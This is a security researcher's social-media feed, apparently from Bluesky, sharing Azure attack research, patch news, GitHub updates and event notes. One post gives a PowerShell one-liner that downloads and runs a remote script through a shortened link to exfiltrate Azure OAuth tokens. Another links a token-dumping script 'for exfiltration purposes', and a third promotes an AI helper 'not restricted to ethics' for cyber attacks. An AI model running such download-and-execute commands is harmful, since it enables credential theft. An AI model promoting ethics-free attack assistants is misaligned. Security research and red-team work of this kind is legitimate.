Rogier Dijkman | MVP's Avatar

Rogier Dijkman | MVP

@rogierdijkman

๐Ÿ” Security Researcher | Marathon Runner | Author | IaC | #GitHub | #PowerShell | #Azure #Bicep | #Copilot

521
Followers
78
Following
49
Posts
26.10.2024
Joined
Posts Following

Latest posts by Rogier Dijkman | MVP @rogierdijkman

Preview
Azure Tenant Takeover: From Exposed Config to Global Admin A soft-deleted file in a public blob container, still retrievable through versioning, leaks a SAS token that exposes an entire file share, ultimately cascading into a complete Azure tenant takeover th...

Azure Tenant Takeover: From Exposed Config to Global Admin azurehacking.com/post/azure-t...

25.02.2026 08:55 ๐Ÿ‘ 1 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image

๐Ÿดโ€โ˜ ๏ธ ๐—ก๐—ฒ๐˜„ ๐—ฃ๐—ข๐—–: ๐—™๐—ฒ๐—ฑ๐—ฒ๐—ฟ๐—ฎ๐˜๐—ฒ๐—ฑ ๐—œ๐—ฑ๐—ฒ๐—ป๐˜๐—ถ๐˜๐˜† ๐—–๐—ฟ๐—ฒ๐—ฑ๐—ฒ๐—ป๐˜๐—ถ๐—ฎ๐—น ๐—ถ๐—ป๐—ท๐—ฒ๐—ฐ๐˜๐—ถ๐—ผ๐—ป

This POC shows how you can inject a federated credential on a UAMI, mint a Graph token in less than ~5s without any infrastructure setup!

azurehacking.com/post.html?sl...

17.02.2026 08:24 ๐Ÿ‘ 1 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Loadingโ€ฆ | AzureHacking Security Blog

Getting Started with the BlackCat PowerShell Module azurehacking.com/post.html?sl...

07.02.2026 14:55 ๐Ÿ‘ 2 ๐Ÿ” 1 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image Post image

Had a great time presenting โ€œHacking Azureโ€ with #BlackCat at @mc2mc.be.

Thank you to @Savaco for providing such an excellent location.

Iโ€™m finalizing the slides, recording short videos, and updating the walkthrough so attendees can easily revisit the steps demonstrated.

17.10.2025 07:07 ๐Ÿ‘ 1 ๐Ÿ” 1 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image

Traveling through Florida for three weeks this summer. I am getting crazy of all the waivers that needs to be signed everywhere.

I wouldnโ€™t be surprised if I need to sign a waiver if you need to fart next time.

02.08.2025 11:40 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0

That was fun spending of my Sunday afternoon. Working on ways to create persistence in Azure on a place where you wouldn't expect it.

If you never look away, you will only see what happens in front of you.

16.03.2025 14:59 ๐Ÿ‘ 1 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image

Operating the camera ๐Ÿ“ท at the #YellowHat event at @Microsoft

06.03.2025 15:22 ๐Ÿ‘ 2 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
WhiteRabbitNeo - Your cybersecurity co-pilot WhiteRabbitNeo is an AI company focused on cybersecurity.

Are you looking for a malcious Copilot that is not restricted to ethics and is willing to be your wingman during cyber attacks? Check app.whiterabbitneo.com

19.02.2025 16:45 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
CrowdStrike University Fast Track Fuels Cybersecurity Training CrowdStrike customers now have access to no-cost fundamentals training for world-class cybersecurity education. Learn more!

www.crowdstrike.com/en-us/blog/c...

15.02.2025 07:38 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Video thumbnail

๐ŸšจAzTokenDumpr ๐Ÿšจ
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)

12.02.2025 19:22 ๐Ÿ‘ 3 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Google Gemini 2.0 Flash is now available to all Copilot users in public preview ยท GitHub Changelog Google Gemini 2.0 Flash is now available to all Copilot users in public preview

github.blog/changelog/20...

07.02.2025 07:28 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Self-Service Membership for GitHub Organizations In this article, we will walk through a solution to automate the process of adding new members to a GitHub organization

In this article, we will walk through a solution that leverages GitHub Actions to automate the process of adding new members to a GitHub organization.

04.02.2025 16:47 ๐Ÿ‘ 3 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Clone2Leak: Your Git Credentials Belong To Us Introduction Hello, Iโ€™m RyotaK ( @ryotkak ), a security engineer at GMO Flatt Security Inc. In October 2024, I was hunting bugs for the GitHub Bug Bounty program. After investigating GitHub Enterprise...

The Clone2Leak vulnerability involves the improper handling of messages in the Git Credential Protocol within GitHub Desktop and Git Credential Manager. This means that an attacker could potentially gain access to your Git credentials, posing a significant security
flatt.tech/research/pos...

30.01.2025 06:17 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Self-hosted password solution in Azure In this article, Iโ€™m excited to introduce a project Iโ€™ve been working on to securely share secrets using only Azure resources.

In this article, I'm excited to introduce a project I've been working on to securely share secrets using only Azure resources.

rogierdijkman.medium.com/self-hosted-...

28.01.2025 09:09 ๐Ÿ‘ 2 ๐Ÿ” 1 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image

๐Ÿšจ ANNOUNCEMENT๐Ÿšจ
I'm excited to announce the start of the "GitHub Lowlands" user group! ๐Ÿคฉ

This is going to be awesome for connecting with others and stay up-date on everything about GitHub.

@github.com @arthurvandijk.bsky.social
#github #copilot #community

24.01.2025 15:35 ๐Ÿ‘ 1 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Detecting โ€˜fasthttpโ€™ bruteforce attacks on Entra ID In this blog post, I will explain how to detect brute force attacks using Kusto Query Language (KQL) in Microsoft Defender. I will provideโ€ฆ

๐Ÿšจย New Blog Alert!ย ๐Ÿšจ
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.

Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender

15.01.2025 11:46 ๐Ÿ‘ 1 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
fasthttp Used in New Bruteforce Campaign SpearTip Security Operations Center, together with the SaaS Alerts team, identified an emerging threat involving the fastHTTP library

www.speartip.com/fasthttp-use...

**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.

15.01.2025 06:31 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Microsoft January 2025 Patch Tuesday Fixes 159 Flaws with 8 Zero-days Windows 11 with KB5050009, KB5050021 and Windows 10 with KB5049981, KB5050008, KB5049993, KB5050013

๐Ÿšจ **Patch Alert!** ๐Ÿšจ Microsoftโ€™s January 2025 Patch Tuesday is here, and itโ€™s packed with security updates! ๐Ÿ›ก๏ธ

๐Ÿ‘‰ Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) ๐Ÿš€ #CyberSecurity #WindowsUpdate

Ready to dive into the details? ๐Ÿ’ป๐Ÿ”ง๐Ÿ”

14.01.2025 19:42 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0

Having fun with Microsoft Azure

Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault

08.01.2025 19:48 ๐Ÿ‘ 2 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0

Yeah, it does work at the bottom al lingerie as the comment block is within the function brackets.

I always find it clear when it is placed at the bottom of the code.

07.01.2025 06:25 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
blackcat/src/Public/generic/Export-AccessTokens.ps1 at main ยท azurekid/blackcat Contribute to azurekid/blackcat development by creating an account on GitHub.

I have created a nice little script as bart of project #blackcat to quickly dump all Azure #oAuth tokens based on the current context and export them to a file for exfiltration purposes.

github.com/azurekid/bla...

06.01.2025 22:04 ๐Ÿ‘ 2 ๐Ÿ” 0 ๐Ÿ’ฌ 1 ๐Ÿ“Œ 0
Preview
Start trading on Coinbase using this link and get 10 EUR in BTC. Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency.

coinbase.com/join/JCCM3ER...

04.01.2025 03:18 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image


WoW, this is awesome!
GitHub Copilot now offers a free tier

github.com/login?return...

18.12.2024 21:37 ๐Ÿ‘ 2 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Kali Linux 2024.4 Release (Python 3.12, Goodbye i386, Raspberry Pi Imager & Kali NetHunter) | Kali Linux Blog Just before the year starts to wrap up, we are getting the final 2024 release out! This contains a wide range of updates and changes, which are in already in effect, ready for immediate download, or u...

Kali Linux 2024.4 released with 14 new tools, deprecates some features

www.kali.org/blog/kali-li...

#Security

17.12.2024 03:51 ๐Ÿ‘ 1 ๐Ÿ” 1 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Unwrapping BloodHound v6.3 with Impact Analysis Just in time for the holidays, sharper tools for faster defense

posts.specterops.io/unwrapping-b...

12.12.2024 17:38 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Oasis Security Research Team Discovers Microsoft Azure MFA Bypass Critical vulnerability could have allowed malicious actors to gain unauthorized access to usersโ€™ Microsoft accounts.


Researchers cracked a Microsoft Azure method for multifactor authentication (MFA) in about an hour

www.oasis.security/resources/bl...

#Microsoft #Security #MFA

11.12.2024 21:18 ๐Ÿ‘ 7 ๐Ÿ” 2 ๐Ÿ’ฌ 2 ๐Ÿ“Œ 0
Preview
Microsoft Fixes Zero-Day, Critical RCEs in Patch Tuesday The zero-day (CVE-2024-49138), plus a worryingly critical unauthenticated RCE security vulnerability (CVE-2024-49112), are unwanted gifts for security admins this season.

Whoop! Patch Tuesday had some interesting stuff. What was keeping you awake?

www.darkreading.com/application-...

11.12.2024 13:33 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Preview
Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access Critical CVE-2024-10905 in SailPoint's IdentityIQ (CVSS 10.0) risks unauthorized file access. Update now

thehackernews.com/2024/12/crit...

04.12.2024 07:49 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Zero Day Quest - Learn to Red Team AI Systems Using PyRIT. Recorded December 2nd 2024
Zero Day Quest - Learn to Red Team AI Systems Using PyRIT. Recorded December 2nd 2024 YouTube video by Microsoft Security Response Center (MSRC)

In today's "Learn to Red Team AI Systems using PyRIT" using PyRIT to find high-quality bugs in generative AI systems. If you missed the live session, you can watch the recording here: youtu.be/jq9DcEL3cHE?...

โ–ถ๏ธPyRIT: github.com/Azure/PyRIT

03.12.2024 06:51 ๐Ÿ‘ 1 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0
Post image

www.microsoftrnd.co.il/bluehatil/co...

28.11.2024 16:13 ๐Ÿ‘ 0 ๐Ÿ” 0 ๐Ÿ’ฌ 0 ๐Ÿ“Œ 0